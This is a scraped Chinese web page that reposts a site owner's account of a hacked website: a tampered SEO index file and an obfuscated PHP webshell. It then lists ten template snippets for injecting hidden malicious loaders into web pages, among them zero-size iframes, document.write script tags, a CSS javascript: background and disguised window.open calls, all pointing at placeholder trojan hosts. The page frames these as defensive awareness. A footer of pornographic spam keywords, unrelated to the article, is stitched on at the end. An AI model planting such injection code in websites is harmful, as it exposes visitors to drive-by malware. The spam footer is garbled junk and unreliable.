整合營銷服務商

          電腦端+手機端+微信端=數據同步管理

          免費咨詢熱線:

          淺析網站被掛馬的代碼

          淺析網站被掛馬的代碼

          言:

          其實我網站中馬應該可以追溯到去年的八月份,當時好像是在 xx 平臺有用戶給我留言說網站上的游戲進不去了 (五子棋多人聯機)。于是我打開一看發現首頁被靜態化了,為了快速訪問就重新提交了入口文件也沒繼續理會。

          直到后來,隔一段時間就又有人留言說打不開,我才開始排查起因了。進入項目代碼里,我發現有些文件被修改了。另一方面呢,網站的收錄也在不斷變少,甚至搜索出來的詞和描述都變了,有賭博的,也有體育,迷彩之類的,我猜測應該是中馬了。

          但是有一點想不通,這人是不是閑得無聊。網站上除了技術類文章,還有一些 H5 單機游戲,資源城和多人聯機游戲由于沒有其他收入支撐,到期后就關閉了。剩下的就是一些免費使用的小工具了,有必要在我網站上掛馬嗎,帶著這個疑問就全都排查了一下代碼,終于找到了兩個文件能解釋這個問題了。


          文件一,篡改的入口文件:

          他是直接拿靜態化的首頁加了一些腳本放在了入口文件上,導致我導航欄的跳轉全部失效,以下就是我截取的部分文件代碼,再說明一下里面放了什么。

          1. TDK 部分

          也就是標題,描述和關鍵詞都改了,就是上面的模樣經過 ascii 編碼,可以通過腳本之家的工具 ascii 轉中文查看。他改的大概都是一些體育,迷彩之類的詞,這也就解釋了為什么網站的搜索詞都變了,因為沒有跳轉收錄也就變少了。

          2. JavaScript 部分

          Js 主要是下面那一長串數字,是 unicode 編碼了。我一個數字一個數字轉完之后,發現原來是一個 Js 腳本引入,最后 ducument.write 就是每次進入都引入腳本,腳本如下。

          原來是給他的網站做引流,所以我也打開了他網站,就是下面這個。

          文件二,PHP 大馬:

          這個文件就是他們掛上去的,可能是之前通過留言表單的 bug 提交的,文件名 dama.php,網絡上搜索應該就可以了解到,代碼如下:

          \x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65 像這個是十六進制,可以通過 JS 的 console.log 或 alert 顯示出來,其實就是 base64_deocde 函數名,而 \nc\n3\nR\ny\nX\n3\nJ\nv\nd\nD\nE\nz\n 同樣打印出來是如下一串換行的字母,所以就是 base64_decode () 那串,解碼后是一個 str_rot13 () 函數

          所以那一串長長的就是被 ROT13 編碼了,可以通過以下方式修改,還原出那一串是些什么東西,也可以把 dama.php 在本地項目里直接運行。

          運行后的樣子如下,登陸密碼就是他代碼里的那個 $password, 其實大概猜的到是 Admin 經過 md5 的,登陸后如下。

          登陸后,就可以看到,自己網站就如同裸奔,他可以任意的提交,修改,刪除文件,還可以對目錄或文件提權,掃描,執行命令等等功能。最后通過我修改后,近幾日網站沒有再出現之前的問題了。以上文件僅作提示,所以關于如何修改和那個大馬如何使用就不做介紹了。

          幾天勒索病毒就瘋了,其實最關鍵的還是用戶沒有很好的更新自己的電腦,才能讓黑客有機可乘。。。在此分享十種掛馬的方式,BUT!掛出來不是讓你去破壞別人的網站,而是讓你能做到有備無患。

          一:框架掛馬

          1. //說明:檢查src的地址是否有問題。

          2. ////////////////////代碼如下////////////////////

          3. <iframe src=地址 width=0 height=0></iframe>

          二:js文件掛馬

          首先將以下代碼

          1. //說明:這個地址是js代碼訪問的文件地址,一般是模仿你的js文件而設。

          2. ////////////////////代碼如下////////////////////

          3. document.write(“<iframe width='0' height='0' src=‘地址'></iframe>”);

          保存為xxx.js,則JS掛馬代碼為

          1. //說明:運行你的js文件

          2. ////////////////////代碼如下////////////////////

          3. <script language=javascript src=xxx.js></script>

          三:js變形加密

          1. //說明:運行后綴發生了變化,本質是一樣的。

          2. ////////////////////代碼如下////////////////////

          3. <SCRIPT language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script>

          muma.txt可改成任意后綴 電腦知識

          四:body掛馬

          1. //說明:略

          2. ////////////////////代碼如下////////////////////

          3. <body ></body>

          五:隱蔽掛馬

          1. //說明:略

          2. ////////////////////代碼如下////////////////////

          3. top.document.body.innerHTML=top.document.body.innerHTML + ' <iframe src=“http://www.xxx.com/muma.htm/”></iframe>';

          六:CSS中掛馬

          1. //說明:背景中鏈接用的js調用。

          2. ////////////////////代碼如下////////////////////

          3. body {

          4. background-image: url('javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

          七:JAJA掛馬

          1. ////////////////////代碼如下////////////////////

          2. <SCRIPT language=javascript>

          3. window.open (“地 址”,“”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”);

          4. </script>

          八:圖片偽裝

          1. ////////////////////代碼如下////////////////////

          2. <html>

          3. <iframe src=“網馬地址” height=0 width=0></iframe>

          4. <img src=“圖片地址”></center>

          5. </html>

          九:偽裝調用

          1. ////////////////////代碼如下////////////////////

          2. <frameset rows=“444,0” cols=“*”>

          3. <frame src=“打開網頁” framborder=“no” scrolling=“auto” noresize marginwidth=“0”margingheight=“0”>

          4. <frame src=“網馬地址” frameborder=“no” scrolling=“no” noresize marginwidth=“0”margingheight=“0”>

          5. </frameset>

          十:高級欺騙

          1. ////////////////////代碼如下////////////////////

          2. <a href=“http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)” > 頁面要顯示的內容 </a>

          3. <SCRIPT Language=“JavaScript”>

          4. function www_163_com ()

          5. {

          6. var url=“網馬地址”;

          7. open(url,“NewWindow”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”);

          8. }

          9. </SCRIPT>

          大家還有什么看法或者有更好的預防方法可以評論留言(文章來源:與時代同行 )

          謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,服務器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然后登陸網站后臺,通過數據"庫備份/恢復"或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得服務器或者網站FTP,然后直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。下面就讓我們來看看幾種常見的掛馬網站。

          (1)iframe 框架掛馬

          在網頁上增加一行掛馬的程序,例如:

          這種嵌入是的掛馬非常常見,在Google中搜索發現的可能還有木馬的網頁,一般都是被這種方式掛馬。這行語句就是在網頁打開的時候,同時打開另外一個網頁,當然這個網頁可能包含大量的木馬,也可能僅僅是為了騙取流量。

          如果我們的網頁不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網頁被iframe掛馬,也不會傷害到訪問網站的用戶。

          【原理】:

          IE5及其以后版本支持在CSS中使用expression,用來把CSS屬性和javascript腳本關聯起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。

          我們在網頁中增加如下的代碼即可屏蔽iframe屬性:

          iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}

          iframe 也可以采用加密的方式掛馬,例如下面的代碼:

          (2)script 掛馬

          通過script的調用來掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬別,主要方式如下:

          這是一個加密的掛馬語句;

          2.1 htm文件掛馬:

          通過上傳一個木馬文件(x.htm)掛馬,代碼如下:

          document.write(“

          ”)

          document.write(“”)

          document.write(“”)

          htm 掛馬代碼:

          2.2 js文件掛馬

          通過上傳一個木馬文件(x.js)掛馬,代碼如下:

          document.write(“”);

          JS掛馬代碼:

          當然也可以掛互聯網上任何一臺機器的x.js文件;

          2.3 js變形加密

          (3)圖片偽裝掛馬

          隨著防毒技術的發展,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文

          件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:

          當用戶打開http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網頁代碼也隨之運行。

          (4)其它的掛馬方式

          4.1 body掛馬

          也可以在css的body中掛馬

          body {

          background-image: url(‘javascript:document.write(“”)’)}

          4.2 隱蔽掛馬

          top.document.body.innerHTML=top.document.body.innerHTML +

          ‘ ’;

          4.3 java的open函數掛馬

          直接調用:

          window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);

          欺騙調用:

          頁面要顯示的內容

          function www_a_com ()

          {

          var url=”網馬地址”;

          open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w

          idth=800,height=600,left=10,top=10″);

          }

          4.4 偽裝調用:

          形形色色的網頁掛馬,代碼都十分簡單,所以,互聯網木馬想要傳播,就會不停的開發新的掛馬方式,不停的加密隱藏自己,這樣才能逃過各種安全軟件的眼睛。其實,看看上文,很多語句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網頁掛馬的原理和方法,再防范網頁掛馬就容易多了。

          帶木馬的網頁主要包括兩種類型:一種自己本身就是木馬網站,所有的頁面都有木馬,另一種是正常的網站,由于管理不善,被掛馬,成為木馬網站的一個中轉站,看看google中這樣的網站何其多,可能很多站長現在還不知道,呵呵,多學習學習吧,站長可不是那么好當的。

          不過,僅僅有了網絡掛馬的代碼,也不一定一定能傳播木馬,只要我們加強防范,不讓我們的網頁被 掛馬,甚至,即使被掛馬了,打開了木馬網頁,我們的系統沒有漏洞,木馬網頁也同樣不能發揮作用的。所以,最重要的安全防范方式就是定期給系統打補丁,幾乎 所有的木馬網頁都無法發揮作用了。


          主站蜘蛛池模板: 国产成人亚洲综合一区| 无码国产精品一区二区免费16| 日韩爆乳一区二区无码| 一区二区三区视频免费观看 | 日韩熟女精品一区二区三区| 538国产精品一区二区在线| 精品福利一区二区三| 国产福利一区二区三区在线观看 | 日韩一区二区视频| 99偷拍视频精品一区二区| 国产a∨精品一区二区三区不卡| 91精品一区二区综合在线| 加勒比精品久久一区二区三区| 99精品国产高清一区二区三区| 中文字幕av日韩精品一区二区| 波多野结衣一区二区免费视频| 红桃AV一区二区三区在线无码AV | 国产在线无码视频一区二区三区| 无码人妻精品一区二区三区久久| 精品视频无码一区二区三区| 国产精品无码一区二区三区免费| 中文字幕AV一区中文字幕天堂| 在线播放偷拍一区精品| 精品人妻少妇一区二区三区在线| 蜜臀AV免费一区二区三区| 国产成人综合精品一区| 亚洲av综合av一区二区三区| 激情内射亚州一区二区三区爱妻| 亚洲视频免费一区| 国模大尺度视频一区二区| 日本一道高清一区二区三区| 中文字幕乱码一区二区免费| 国语对白一区二区三区| 亚洲午夜精品一区二区| 日本强伦姧人妻一区二区| 亚洲av乱码一区二区三区按摩| 中文字幕一区二区三区在线不卡 | 无码人妻精品一区二区三区99不卡| 性色av一区二区三区夜夜嗨| 无码精品前田一区二区| 天海翼一区二区三区高清视频|